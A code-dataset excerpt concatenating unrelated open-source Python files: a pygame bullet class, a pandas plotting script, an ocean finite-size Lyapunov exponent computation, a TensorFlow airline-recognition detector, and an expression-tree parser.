"""Cria um objeto para o projétil na posição atual da espaçonave."""
super().__init__()
self.screen = ai_game.screen
self.settings = ai_game.settings
self.color = self.settings.bullet_color
# Cria um retângulo para o projétil em (0, 0) e, em seguida, define
# a posição correta
self.rect = pygame.Rect(0, 0, self.settings.bullet_width,
self.settings.bullet_height)
self.rect.midtop = ai_game.ship.rect.midtop
# Armazena a posição do projétil como um valor decimal
self.y = float(self.rect.y)
def update(self):
"""Move o projétil para cima na tela."""
# Atualiza a posição decimal do projétil
self.y -= self.settings.bullet_speed
# Atualiza a posição de rect
self.rect.y = self.y
def draw_bullet(self):
"""Desenha o projétil na tela."""
pygame.draw.rect(self.screen, self.color, self.rect)
``` |
{
"source": "joaobcampos/article",
"score": 3
} |
#### File: build/bin/read_data.py
```python
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import numpy as np
def plot_info(full_data, x_axis, y_axis):
kys = full_data.keys()
colors = cm.rainbow(np.linspace(0,1, len(kys)))
clr = 0
for i in kys:
plt.scatter(full_data[i][x_axis], full_data[i][y_axis], label=i,
color=colors[clr])
clr = clr + 1
plt.xlabel(x_axis)
plt.ylabel(y_axis)
plt.legend()
#plt.show()
plt.savefig(y_axis.strip() + '.png')
plt.close()
def main():
df = pd.read_csv("data.csv");
print(df)
column_names = list(df)
methods = pd.unique(df[column_names[0]])
noise_levels = pd.unique(df[column_names[1]])
print("column names")
print(column_names)
print("methods")
print(methods)
print("noise levels")
print(noise_levels)
statistical_info = {}
for i in methods:
new_info = pd.DataFrame(columns=column_names[1:(len(column_names))])
for j in noise_levels:
stat = df[df[column_names[0]] == i][(df[column_names[1]] > j - 0.1) & (df[column_names[1]] < j + 0.1)].mean()
count_info = df[df[column_names[0]] == i][(df[column_names[1]] > j - 0.1) & (df[column_names[1]] < j + 0.1)].shape
print("Count")
print("method: " + i + " noise level: " + str(j))
print(count_info)
#print(stat)
new_info = new_info.append(stat, ignore_index=True)
print(new_info)
statistical_info[i] = new_info
kys = statistical_info.keys()
for i in kys:
print("**************")
print(i)
print(statistical_info[i])
plot_info(statistical_info, column_names[1], column_names[2])
plot_info(statistical_info, column_names[1], column_names[3])
plot_info(statistical_info, column_names[1], column_names[4])
if __name__ == "__main__":
main()
``` |
{
"source": "joaob-centec/fsle",
"score": 2
} |
#### File: joaob-centec/fsle/Compute_FSLE_WIbUS_Monthly.py
```python
from parcels import FieldSet, ParticleSet, JITParticle, AdvectionRK4, ErrorCode
import xarray as xr
import numpy as np
import pandas as pd
#from pyproj import Geod
import datetime
#import cartopy.crs as ccrs
#import cartopy.feature as cfeature
#import matplotlib.pyplot as plt
import argparse
import os
import glob
import matplotlib.dates
## Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("fYear", type=int, help="year of computation")
parser.add_argument("fMonth", type=int, help="month of computation")
parser.add_argument("fStep", type=int, help="FSLE field time step (days)")
parser.add_argument("outStep", type=int, help="trajectory output time step (hours)")
parser.add_argument("maxD", type=float, help="distance threshold")
parser.add_argument("iniD", type=int, help="initial distance (grid subsample)")
parser.add_argument("maxT", type=int, help="max trajectory integration interval (days)")
parser.add_argument("timeStep", type=float, help="trajectory integration time step (minutes)")
parser.add_argument("westLon", type=float, help="westernmost longitude (-180º to 180º)")
parser.add_argument("eastLon", type=float, help="easternmost longitude (-180º to 180º)")
parser.add_argument("southLat", type=float, help="southermost latitude (-90º to 90º)")
parser.add_argument("northLat", type=float, help="northermost latitude (-90º to 90º)")
parser.add_argument("z", type=float, help="depth (positive downwards)")
args = parser.parse_args()
# 1. Distance threshold:
maxD=float(args.maxD) # in m
# 2. Initial distance (as a function of velocity grid spacing):
iniD = args.iniD
# 3. Maximum integration time interval:
maxT=datetime.timedelta(days=args.maxT)
# 4. Integration timestep (<0 --> backward FSLE)
timeStep=-datetime.timedelta(minutes=args.timeStep)
# Initial time of the velocity field
vInitialDate=datetime.datetime(1999,6,1,12,0,0)
# FSLE grid
lonMin= args.westLon # ºE
lonMax= args.eastLon # ºE
latMin= args.southLat # ºN
latMax= args.northLat # ºN
zMin= 0 # Surface
zMax= 300 # m
# Compute FSLE for year/month
fYear = args.fYear
fMonth = args.fMonth
# FSLE field step in days
fStep = args.fStep
# FSLE field dates
# Particle trajectory output step in hours
outStep = args.outStep
# Echo input parameters
print("FSLE computation with following parameters: ")
print(" fYear: "+str(fYear))
print(" fMOnth: "+str(fMonth))
print(" maxD:"+str(maxD))
# 3.1 Get velocity grid lon/lat
# Velocity grid file
vGridFileName = 'IBI_Data/IBI_MULTIYEAR_PHY_005_002-TDS_199906.nc'
# Velocity grid variables names
vLat = "latitude"
vLon = "longitude"
vDepth = "depth"
# Load velocity grid data
vGridData = xr.open_dataset(vGridFileName)
# Show info of the data
#print(vGridData)
# Velocity grid lon/lat limited to FSLE grid limits
tmpL = vGridData.latitude.sel(latitude = slice(latMin, latMax))
fLat0 = xr.DataArray(data=tmpL.values, dims=["j"], coords=[np.arange(tmpL.size)])
tmpL = vGridData.longitude.sel(longitude = slice(lonMin, lonMax))
fLon0 = xr.DataArray(data=tmpL.values, dims=["i"], coords=[np.arange(tmpL.size)])
fZ = vGridData.depth.sel(depth = slice(zMin, zMax))
# Interpolate latitude and longitude to get FLSE grid nodes
fJ = np.linspace(0,fLat0.size-1,fLat0.size*iniD-1,endpoint=True)
fI = np.linspace(0,fLon0.size-1,fLon0.size*iniD-1,endpoint=True)
fLat = fLat0.interp(j=fJ)
fLon = fLon0.interp(i=fI)
nF = fLat.size * fLon.size
nLat = fLat.size
nLon = fLon.size
# Create initial condition vectors
fLonI, fLatI = np.meshgrid(fLon,fLat,sparse=False,indexing='xy')
## Compute neighbor particle index grid
# Grid with particle number
fNeig = np.reshape(np.arange(nF),fLonI.shape).astype(int)
# Arrays with neighbour particle indices
iNeig = np.zeros((nLat, nLon, 4),dtype=np.int16)
for j in range(nLat):
for i in range(nLon):
iNeig[j,i,0] = fNeig[j,min(i+1,nLon-1)]
iNeig[j,i,1] = fNeig[j,max(i-1,0)]
iNeig[j,i,2] = fNeig[min(j+1,nLat-1),i]
iNeig[j,i,3] = fNeig[max(j-1,0),i]
# Grid with center particle distance (greatest distance between particle (i,j) and neighbour particles (i+1,j).(i-1,j),(i,j+1),(i,j-1))
fDist = np.zeros(fNeig.shape)
fIDist = np.zeros(fNeig.shape) # Initial distances
def haversine(lonC,latC,lonN,latN):
# Computes the great-circle distance between particles.
# Uses the Haversine formulas (http://www.movable-type.co.uk/scripts/gis-faq-5.1.html).
# dlon = lon2 - lon1
# dlat = lat2 - lat1
# a = sin^2(dlat/2) + cos(lat1) * cos(lat2) * sin^2(dlon/2)
# c = 2 * arcsin(min(1,sqrt(a)))
# d = R * c
distC=np.zeros(lonN.shape) # A nLat x nLon x 4 array
# If any particle is deleted (position is nan,nan), set position to c particle, so that distance is 0
for i in range(4):
nanN = np.where(np.isnan(lonN[:,:,i]),True,False)
lonN[nanN,i]=lonC[nanN]
latN[nanN,i]=latC[nanN]
for i in range(4):
dLon = (lonN[:,:,i] - lonC)*np.pi/180.
dLat = (latN[:,:,i] - latC)*np.pi/180.
A = np.sin(0.5*dLat)**2 + np.cos(latC*np.pi/180) * np.cos(latN[:,:,i]*np.pi/180) * np.sin(0.5*dLon)**2
C = 2 * np.arcsin(np.fmin(1,np.sqrt(A)))
distC[:,:,i] = 6371000 * C
return np.max(distC,axis=2)
# Compute initial distances (distances with obs=0)
eLon = np.zeros((nLat,nLon,4))
eLat = np.zeros((nLat,nLon,4))
for i in range(4):
eLon[:,:,i] = np.reshape(fLonI.flat[iNeig[:,:,i].flatten()],(nLat,nLon))
eLat[:,:,i] = np.reshape(fLatI.flat[iNeig[:,:,i].flatten()],(nLat,nLon))
fIDist = haversine(fLonI,fLatI,eLon,eLat)
# Set up the velocity fields in a FieldSet object
velocityFiles=sorted(glob.glob('/home/joao/Ciencia/FSLE_WIbUS/IBI_Data/IBI_MULTIYEAR_PHY_005_002-TDS_*.nc'))# +
#fname = '/home/joao/Ciencia/FSLE_WIbUS/IBI_Data/*.nc'
filenames = {'U': velocityFiles, 'V': velocityFiles}
variables = {'U': 'uo', 'V': 'vo'}
dimensions = {'U': {'lat': 'latitude', 'lon': 'longitude', 'time': 'time'},
'V': {'lat': 'latitude', 'lon': 'longitude', 'time': 'time'}}
fieldset = FieldSet.from_netcdf(filenames, variables, dimensions)
# Define recovery kernel
def DeleteParticle(particle, fieldset, time):
# Delete particles who run out of bounds.
#print("Particle %d deleted at (%f, %f, %f)" % (particle.id,
# particle.lon, particle.lat,
# particle.depth))
particle.delete()
## Compute the FSLE fields
fDate = datetime.datetime(fYear,1,1,12,0,0) # First FSLE field for 1st of January of fYear and then every fStep days
nowDate = datetime.datetime.now()
fDates = pd.date_range(datetime.datetime(fYear,fMonth,1,12,0,0),datetime.datetime(fYear,fMonth+1,1,12,0,0)-
datetime.timedelta(days=1), freq=str(fStep)+'D')
nDates = fDates.size
fField = np.zeros((nLat, nLon, nDates))
k = 0 # Loop Counter
fFileTag = str(fYear)+"{:02d}".format(fMonth)
particlesFile="fParticles"+ fFileTag +".nc"
while k < 1:#nDates:
print("compute FSLE for " + fDates[k].strftime("%Y-%m-%d %H:%M:%S"))
countTime = datetime.datetime.now()-nowDate
countTimeDays = countTime.days
countTimeHours = int(countTime.seconds/3600)
countTimeMinutes = int((countTime.seconds/3600-countTimeHours)*60)
countTimeSeconds = countTime.seconds - countTimeHours*3600 - countTimeMinutes*60
print(" at " + str(countTimeDays) + " days, " + str(countTimeHours) + " hours, "
+ str(countTimeMinutes) + " minutes, " + str(countTimeSeconds) + " seconds. ")
## Define the particles type and initial conditions in a ParticleSet object
fSetTime = fDates[k]-vInitialDate # Release date in seconds from vInitialDate
fSet = ParticleSet(fieldset=fieldset, # the fields on which the particles are advected
pclass=JITParticle, # the type of particles (JITParticle or ScipyParticle)
lon=fLonI.flatten(), # release longitudes
lat=fLatI.flatten(), # release latitudes
time=fSetTime.total_seconds(), # Release time (seconds from first time of velocity field )
depth=np.full(nF,args.z), # release depth
)
output_file = fSet.ParticleFile(name=particlesFile, outputdt=3600*outStep) # the file name and the time step of the outputs
fSet.execute(AdvectionRK4, # the kernel (which defines how particles move)
runtime=maxT, # the total length of the run
dt=timeStep, # the timestep of the kernel
recovery={ErrorCode.ErrorOutOfBounds: DeleteParticle},
output_file=output_file)
# 4. Exporting the simulation output to a netcdf file
output_file.export()
output_file.close()
# Load trajectory data
fData = xr.open_dataset(particlesFile)
#print(fData)
#print(fData.z[dict(traj=5,obs=slice(0,100))])
fCalc = np.ones(fDist.shape, dtype=bool) # Flag to indicate distance has reach maxD so we don't need to keep computing distances for this particle anymore
#fT0 = np.reshape(fData.time[:,0].values,fLonI.shape) # Initial time (we need this to compute elapsed time until distanced threshold is reached)
fT = np.zeros(fLonI.shape) # Save here the time distance has reached maxD
fDist = np.zeros(fLonI.shape) # Save here the distance
for m in np.arange(1,fData.dims['obs']):#fData.dims['obs']): # Loop over times
# Active particles at observation m
activeParticles = np.where(fCalc,True,False)
# Filter active particles
fTraj = np.reshape(fData.trajectory[:,m].values,(nLat,nLon))
# Deleted active particles at observation m
deletedParticles = np.where(np.logical_and(np.isnan(fTraj),activeParticles), True, False)
# Compute interparticle Distance
cLon = np.reshape(fData.lon[:,m].values,(nLat,nLon))
cLat = np.reshape(fData.lat[:,m].values,(nLat,nLon))
for i in range(4):
eLon[:,:,i] = np.reshape(fData.lon[:,m].values[iNeig[:,:,i].flatten()],(nLat,nLon))
eLat[:,:,i] = np.reshape(fData.lat[:,m].values[iNeig[:,:,i].flatten()],(nLat,nLon))
# Distance computed at observation m for those particles that are still active and have not been deleted
distanceParticles = np.logical_and(np.logical_not(deletedParticles),activeParticles)
fDistTmp = np.where(distanceParticles,haversine(cLon,cLat,eLon,eLat),0)
# Where distance is greater than threshold, set final distance
distFlag = np.where(fDistTmp>maxD, True, False)
# Set distance and time
setDist = distFlag#, np.logical_not(deletedParticles))
fDist[setDist]=fDistTmp[setDist]
obsT=np.reshape(fData.time[:,m].values-fData.time[:,0].values,(nLat,nLon))
fT[setDist]=obsT[setDist]
filterParticle = np.logical_or(setDist, deletedParticles)
fCalc[filterParticle]=False
if m % 500 == 0:
print(" Computing distances at observation " + str(m))
## Compute FSLE
cff1=np.log(fDist/fIDist)
cff2=-fT/(1000000000*86400.) # From nanoseconds to days
#fField = cff1 / cff2
fField[:,:,k] = cff1 / cff2#xr.DataArray(np.where(np.isinf(fField),0,fField), coords=[fLat, fLon], dims=["latitude", "longitude"])
# Do some cleanup
del fData
os.remove(particlesFile)
# Step counter
k = k + 1
## Save FSLE data as xarray DataSet
#fsleData = xr.DataArray(fField, coords=[fLat, fLon, fDates], dims=["latitude", "longitude", "time"])
fsleData = xr.Dataset(
{
"fsle":(["latitude","longitude","time"],fField)
},
coords={
"latitude":("latitude",fLat),
"longitude":("longitude",fLon),
"time":("time",fDates)
}
)
fsleData["fsle"].attrs['units'] = 'day-1'
fsleData["fsle"].attrs['standard_name'] = 'finite-size lyapunov exponent'
fsleData.attrs['distance_threshold'] = maxD
fsleData.attrs['initial_distance (subsampling of background velocity field grid)'] = iniD
fsleData.attrs['maximum particle integration time (T0 + seconds)'] = maxT.total_seconds()
fsleData.attrs['particle integration time step'] = timeStep.total_seconds()
fsleData.attrs['particle trajectory output time step (hours)'] = outStep
fsleData.attrs['velocity grid source']=vGridFileName
fsleData.attrs['velocity data source']=velocityFiles
fsleOutputFile = "FSLE_WIbUS_" + fFileTag + ".nc" #str(fYear) + ".nc"
fsleData.to_netcdf(fsleOutputFile,encoding={"time": {"dtype": "double"}})
``` |
{
"source": "joaobi/planespotter",
"score": 2
} |
#### File: planespotter/libs/planespotter.py
```python
import warnings
import os
import sys
#sys.path.append("C:/projects/models/research/")
#sys.path.append("C:/projects/models/research/object_detection")
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),'../libs')))
with warnings.catch_warnings():
warnings.filterwarnings("ignore",category=FutureWarning)
from tensorflow.python.keras.models import load_model
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image, ExifTags
# import keras.backend as K
#import time
import tensorflow as tf
from object_detection.utils import ops as utils_ops
#import ops as utils_ops
from PIL import ImageDraw
import PIL.ImageFont as ImageFont
import json
PATH_TO_OUTPUT_DIR = 'output'
DEBUG = False
MODEL_DIR = 'models'
#
# Prediction Model
#
predict_model_name = '6airlines_75epochs_200_3.h5'
#PREDICT_MODEL = os.path.join(MODEL_DIR,predict_model_name)
labels = {0: 'EK', 1: 'KE', 2: 'NH', 3: 'OZ', 4:'QF', 5:'SQ'}
airline_names = {0: 'Emirates', 1: 'Korean Air', 2: 'ANA', 3: 'Asiana', 4:'Qantas', 5:'Singapore Airlines'}
SIZE = 500 # Resize for better inference
photo_size = 200 # Size for loading into CNN
#
# Detection Model
#
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_FROZEN_GRAPH = 'frozen_inference_graph.pb'
PLANE_DETECTION_THRESHOLD = 0.60 # Detect plans above this prob. threshold
BB_COLOR = "blue"
BB_TEXT_COLOR = "white"
class planespotter:
def __init__(self, model_location = MODEL_DIR):
# print('INIT')
self._init_detector(detect_model_loc =
os.path.join(model_location,PATH_TO_FROZEN_GRAPH))
# print('Loaded Detector')
self._init_predictor(pred_model_location =
os.path.join(model_location,predict_model_name))
# print('Loaded Predictor')
def _init_detector(self, detect_model_loc):
self.model_name = detect_model_loc
# print(self.model_name)
self._build_obj_detection_graph()
# 1. Loaded Image and then 2. Loaded Image with bboxes on it
self.image_np = []
# Boudnding Boxes for the planes
self.bbox = []
# Array with the cropped images of individual planes
self.cropped_planes = []
self.plane_idxs = []
self.output_dict = []
self.session = tf.Session(graph=self.detection_graph)
self.image_name = ''
def predict_image(self,image_name):
# 1. Detect planes on the image
self.detect_planes(image_name)
# print('Detected planes')
# 2. Predict the airline of each plane
self.predict_airline()
# print('Predicted Airline')
# 3. Draw the bounding boxes for each plane with airline and prob.
self.draw_custom_bounding_boxes()
# print('Drew BBs')
# 4. Clear to avoid errors
# tf.reset_default_graph() # for being sure
# K.clear_session()
# import gc
# gc.collect()
# print('CLOSING SESSION')
# self.session.close()
# tf.reset_default_graph()
"""
Detect Planes and Crop them in the provided image
"""
def detect_planes(self,image_name):
#
# 0. Pre Process Image
#
self.image_name = image_name
image = self._preprocess_image(image_name)
#
# 1. Detect all Planes on this image
#
# step_time = time.time()
# the array based representation of the image will be used later in order to prepare the
# result image with boxes and labels on it.
(im_width, im_height) = image.size
if image.format == 'PNG':
image = image.convert('RGB')
image_np = np.array(image.getdata()).reshape((im_height, im_width, 3)).astype(np.uint8)
# Actual detection.
output_dict = self._run_inference_for_single_image(image_np, self.detection_graph)
# print("[.............Detect objects] --- %.2f seconds ---" % (time.time() - step_time))
#Only run the inference for Planes (Coco class 5)
plane_idxs = np.where(output_dict['detection_classes']==5)
self.plane_idxs = plane_idxs
self.output_dict = output_dict
#
# 2. Crop Planes on this image
#
im_width, im_height = image.size
cropped_planes = []
self.bbox = []
at_least_one_ex = -1
num_planes_image = len(output_dict['detection_boxes'][plane_idxs])
num_planes_thresh = len(np.where(output_dict['detection_scores'][plane_idxs]
>PLANE_DETECTION_THRESHOLD)[0])
# I will still pick the highest if there are more than 0 but none is
# greater than the threshold
if num_planes_image > 0 and num_planes_thresh == 0:
at_least_one_ex = np.argmax(output_dict['detection_scores'][plane_idxs])
for plane in range(0,num_planes_image):
plane_acc_score = output_dict['detection_scores'][plane_idxs][plane]
if (plane_acc_score>PLANE_DETECTION_THRESHOLD or plane == at_least_one_ex):
ymin = output_dict['detection_boxes'][plane_idxs][plane][0]
xmin = output_dict['detection_boxes'][plane_idxs][plane][1]
ymax = output_dict['detection_boxes'][plane_idxs][plane][2]
xmax = output_dict['detection_boxes'][plane_idxs][plane][3]
xmargin = im_width*0.02
ymargin = im_height*0.02
area = (xmin * im_width-xmargin,
ymin * im_height-ymargin,
xmax * im_width+xmargin,
ymax * im_height+ymargin)
self.bbox.append([ymin,xmin,ymax,xmax])
cropped_planes.append(image.crop(area))
self.cropped_planes = cropped_planes
self.image_np = image_np
def draw_custom_bounding_boxes(self):
thickness = 1
color = BB_COLOR
bbox = self.bbox
airlines = self.predicted_airline
probs = self.predicted_prob
try:
font = ImageFont.truetype('arial.ttf', 10)
except IOError:
print('[ERROR] Could not load Font!!!')
font = ImageFont.load_default()
final_image = Image.fromarray(self.image_np)
draw = ImageDraw.Draw(final_image)
im_width, im_height = final_image.size
# print(airlines)
for i in range(0,len(airlines)):
ymin,xmin,ymax,xmax = bbox[i][0],bbox[i][1],bbox[i][2],bbox[i][3]
(left, right, top, bottom) = (xmin * im_width, xmax * im_width,
ymin * im_height, ymax * im_height)
draw.line([(left, top), (left, bottom), (right, bottom),
(right, top), (left, top)], width=thickness, fill=color)
text_bottom = top
display_str = '%s (%.2f%%)'%(airlines[i],probs[i])
text_width, text_height = font.getsize(display_str)
margin = np.ceil(0.05 * text_height)
draw.rectangle(
[(left, text_bottom - text_height - 2 * margin), (left + text_width,
text_bottom)],
fill=BB_COLOR)
draw.text(
(left + margin, text_bottom - text_height - margin),
display_str,
fill=BB_TEXT_COLOR,
font=font)
text_bottom -= text_height - 2 * margin
(im_width, im_height) = final_image.size
if final_image.format == 'PNG':
final_image = final_image.convert('RGB')
# final_image = final_image.resize((im_height, im_width), Image.ANTIALIAS)
# self.image_np = np.array(final_image.getdata()).astype(np.uint8)
self.image_np = np.array(final_image.getdata()).reshape(
(im_height, im_width, 3)).astype(np.uint8)
def _run_inference_for_single_image(self,image, graph):
# step_time = time.time()
# global detection_graph
with self.detection_graph.as_default():
sess = self.session
# Get handles to input and output tensors
ops = tf.get_default_graph().get_operations()
all_tensor_names = {output.name for op in ops for output in op.outputs}
tensor_dict = {}
for key in [
'num_detections', 'detection_boxes', 'detection_scores',
'detection_classes', 'detection_masks'
]:
tensor_name = key + ':0'
if tensor_name in all_tensor_names:
tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(
tensor_name)
if 'detection_masks' in tensor_dict:
# The following processing is only for single image
detection_boxes = tf.squeeze(tensor_dict['detection_boxes'], [0])
detection_masks = tf.squeeze(tensor_dict['detection_masks'], [0])
# Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.
real_num_detection = tf.cast(tensor_dict['num_detections'][0], tf.int32)
detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])
detection_masks = tf.slice(detection_masks, [0, 0, 0], [real_num_detection, -1, -1])
detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(
detection_masks, detection_boxes, image.shape[0], image.shape[1])
detection_masks_reframed = tf.cast(
tf.greater(detection_masks_reframed, 0.5), tf.uint8)
# Follow the convention by adding back the batch dimension
tensor_dict['detection_masks'] = tf.expand_dims(
detection_masks_reframed, 0)
image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')
# print("[.............pre inference] --- %.2f seconds ---" % (time.time() - step_time))
# Run inference
# step_time = time.time()
output_dict = sess.run(tensor_dict,
feed_dict={image_tensor: np.expand_dims(image, 0)})
# print("[.............Inference] --- %.2f seconds ---" % (time.time() - step_time))
# step_time = time.time()
# all outputs are float32 numpy arrays, so convert types as appropriate
output_dict['num_detections'] = int(output_dict['num_detections'][0])
output_dict['detection_classes'] = output_dict[
'detection_classes'][0].astype(np.uint8)
output_dict['detection_boxes'] = output_dict['detection_boxes'][0]
output_dict['detection_scores'] = output_dict['detection_scores'][0]
if 'detection_masks' in output_dict:
output_dict['detection_masks'] = output_dict['detection_masks'][0]
# print("[.............Post Inference] --- %.2f seconds ---" % (time.time() - step_time))
return output_dict
def _build_obj_detection_graph(self):
# global detection_graph
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(self.model_name, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
self.detection_graph = detection_graph
def _preprocess_image(self,image_name):
img=Image.open(image_name)
if img.format=='JPEG':
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation]=='Orientation':
break
# Rotate the image if needed
if img._getexif() != None:
exif=dict(img._getexif().items())
if orientation in exif.keys():
if exif[orientation] == 3:
img=img.rotate(180, expand=True)
# resize to get better inference speeds
basewidth = SIZE
wpercent = (basewidth / float(img.size[0]))
hsize = int((float(img.size[1]) * float(wpercent)))
img = img.resize((basewidth, hsize), Image.ANTIALIAS)
return img
#
# Prediction Methods
#
def _init_predictor(self,pred_model_location):
try:
model = load_model(pred_model_location)
model.load_weights(pred_model_location)
model._make_predict_function()
self.model = model
self.preds = []
self.predicted_airline = []
self.predicted_prob = []
except Exception as e:
print("ERROR: _init_predictor "+ str(e))
def predict_airline(self):
self.preds = []
self.predicted_airline = []
self.predicted_prob = []
model = self.model
img_array = self.cropped_planes
try:
for img in img_array:
photo = img.resize((photo_size,photo_size), Image.ANTIALIAS)
x = np.array(photo)
x = x / 255.
x = np.expand_dims(x, axis=0)
preds = model.predict(x)
if DEBUG:
predicted_airline = labels[np.argmax(preds[0])]
prob = np.max(preds[0])
plt.title('Airline '+predicted_airline+' with acc. '+ str(prob))
plt.imshow(photo)
plt.axis('off')
plt.show()
predicted_airline = airline_names[np.argmax(preds[0])]
prob = np.max(preds[0])*100
self.preds.append(preds)
self.predicted_airline.append(predicted_airline)
self.predicted_prob.append(prob)
# print(preds)
except Exception as e:
print("[ERROR] [predict_airline]: "+ str(e))
def print_stats(self):
print("#objects detected: ",self.output_dict['num_detections'])
print("#planes detected: ",str(len(self.plane_idxs[0])))
thresh_nparr = np.where(self.output_dict['detection_scores'][self.plane_idxs]>PLANE_DETECTION_THRESHOLD)[0]
if len(self.plane_idxs[0])> 0 and len(thresh_nparr) == 0 :
num_planes_thresh = 1
else:
num_planes_thresh = len(thresh_nparr)
print("#planes shown: ",str(num_planes_thresh))
# print(self.preds)
for i in range(len(self.preds)):
# score = self.output_dict['detection_scores'][i]
# print("----->[Plane BBox %s]: %.2f%%"%(str(i),score))
# for j,score in np.ndenumerate(np.sort(self.preds[i][0])[::-1]):
# print('Probability %s => [%0.4f%%]' % (labels[j[0]]
# , score*100))
plane = sorted(dict(zip(labels,self.preds[i][0])).items(),key=lambda kv: kv[1])[::-1]
for j,score in plane:
print('Probability %s => [%0.4f%%]' % (labels[j]
, score))
def print_image(self):
IMAGE_SIZE = (12, 8)
plt.figure(figsize=IMAGE_SIZE)
plt.imshow(self.image_np)
plt.show()
def save_image(self,dir_path=PATH_TO_OUTPUT_DIR):
image = Image.fromarray(self.image_np)
filename = os.path.split(self.image_name)[-1]
image.save(os.path.join(dir_path, filename), 'JPEG',subsampling=0, quality=100)
def save_metadata(self,dir_path=PATH_TO_OUTPUT_DIR):
metadata = {}
metadata['filename'] = os.path.split(self.image_name)[-1]
metadata['num_detections'] = self.output_dict['num_detections']
metadata['planes_detected'] = len(self.plane_idxs[0])
thresh_nparr = np.where(self.output_dict['detection_scores'][self.plane_idxs]>PLANE_DETECTION_THRESHOLD)[0]
num_planes_thresh = len(thresh_nparr)
if len(self.plane_idxs[0])> 0 and num_planes_thresh == 0 :
num_planes_thresh = 1
metadata['planes_shown'] = num_planes_thresh
metadata['detection_boxes'] = self.output_dict['detection_boxes'][self.plane_idxs].tolist()
metadata['detection_scores'] = self.output_dict['detection_scores'][self.plane_idxs].tolist()
metadata['planes'] = []
for i in range(len(self.preds)):
name = 'plane_'+str(i)
tmp = {}
plane = sorted(dict(zip(labels,self.preds[i][0])).items(),key=lambda kv: kv[1])[::-1]
for j,score in plane:
print('Probability %s => [%0.4f%%]' % (labels[j]
, score*100))
# tmp['Airline_'+str(j)] = labels[j]
# tmp['ProbAir_'+str(j)] = score*100
tmp[labels[j]] = score*100
# for j,score in np.ndenumerate(np.sort(self.preds[i][0])[::-1]):
# print('Probability %s => [%0.4f%%]' % (labels[j[0]]
# , score*100))
# tmp['Airline_'+str(j[0])] = labels[j[0]]
# tmp['ProbAir_'+str(j[0])] = score*100
print(tmp)
# metadata[name] = tmp
print(json.dumps(tmp))
# metadata['planes'].append({'Airline_0': 'EK', 'ProbAir_0': 0.8939682, 'Airline_4': 'QF', 'ProbAir_4': 0.09370398, 'Airline_3': 'OZ', 'ProbAir_3': 0.009453673, 'Airline_5': 'SQ', 'ProbAir_5': 0.0014314898, 'Airline_1': 'KE', 'ProbAir_1': 0.00076366, 'Airline_2': 'NH', 'ProbAir_2': 0.0006790766})
metadata['planes'].append(json.dumps(tmp))
# print(metadata)
# print(json.dumps(metadata, indent=4))
# print(metadata)
metadata['predicted_airline'] = self.predicted_airline
metadata['predicted_prob'] = self.predicted_prob
print(metadata)
# print(json.dumps(metadata, indent=4))
return metadata
# json_data = json.dumps(metadata)
# return json_data
``` |
{
"source": "joaobose/CI3641-exam-1",
"score": 4
} |
#### File: pregunta-6/src/expression.py
```python
def isOperator(x):
return x == '+' or x == '-' or x == '*' or x == '/'
def hasLowestPrecedence(x):
return x == '+' or x == '-'
def hasHighestPrecedence(x):
return x == '*' or x == '/'
# Representamos una expresion como un arbol binario.
# Esto porque todos lo operadores soportados son binarios.
class ExpressionTree:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
def infix(self):
# Los nodos hojas son numeros
if self.right is None and self.left is None:
return f'{self.value}'
leftExp = self.left.infix()
ownExp = f'{self.value}'
rightExp = self.right.infix()
if hasHighestPrecedence(ownExp):
# Check de menor precedencia izquierda
if hasLowestPrecedence(self.left.value):
leftExp = f'({leftExp})'
# Check de menor precedencia derecha
# Check de asociatividad del (/)
if hasLowestPrecedence(self.right.value) or self.right.value == '/':
rightExp = f'({rightExp})'
# Check de asociatividad del (-)
elif ownExp == '-':
if hasLowestPrecedence(self.right.value):
rightExp = f'({rightExp})'
return f'{leftExp} {ownExp} {rightExp}'
def __call__(self):
# Los nodos hojas son numeros
if self.left is None and self.right is None:
return self.value
# Evaluamos izquierda y derecha
leftEval = self.left()
rightEval = self.right()
# Operamos izquierda y derecha
if self.value == '+':
return leftEval + rightEval
if self.value == '-':
return leftEval - rightEval
if self.value == '*':
return leftEval * rightEval
else:
return leftEval // rightEval
# Construye un ExpressionTree a partir de una expresion en postfix
def postfixToExpressionTree(postfix):
# Utilizamos un stack
stack = []
# Iteramos por cada caracter de la expresion
for char in postfix.strip().split(' '):
# Caso: es un un numero
if not isOperator(char):
# Agregamos al stack un nodo hoja
stack.append(ExpressionTree(int(char)))
# Caso: es un operador
else:
# Creamos un nodo operador
operator = ExpressionTree(char)
# Como estamos es postfix, los operandos son los dos operandos calculados mas recientemente
right = stack.pop()
left = stack.pop()
operator.right = right
operator.left = left
# Agregamos el nodo al stack
stack.append(operator)
# Retornamos la expresion mas reciente
# Es decir, la padre
return stack.pop()
# Construye un ExpressionTree a partir de una expresion en prefix
def prefixToExpressionTree(prefix):
# Funcion auxiliar que obtiene el ExpressionTree de un expression (en prefix) comenzando en el indice start
# Retorna el ExpressionTree (de existir) y el indice en donde termina dicho ExpressionTree.
def parse(expression, start):
# Si hay overflow retornamos None
if start >= len(expression):
return None, start
# Obtenemos el primero caracter
char = expression[start]
# Caso: es un numero
if not isOperator(char):
# Retornamos un nodo hoja
return ExpressionTree(int(char)), start
# Caso: es un operador
else:
# Hacemos parse de la expresion de la izquierda
(leftExp, leftEnd) = parse(expression, start + 1)
# Hacemos parse de la expresion de la derecha (a partir de donde termino leftExp)
(rightExp, rightEnd) = parse(expression, leftEnd + 1)
# Creamos el nodo operador
currentExp = ExpressionTree(char)
currentExp.left = leftExp
currentExp.right = rightExp
# Retornamos el nodo operador junto con el indice donde termina
return currentExp, rightEnd
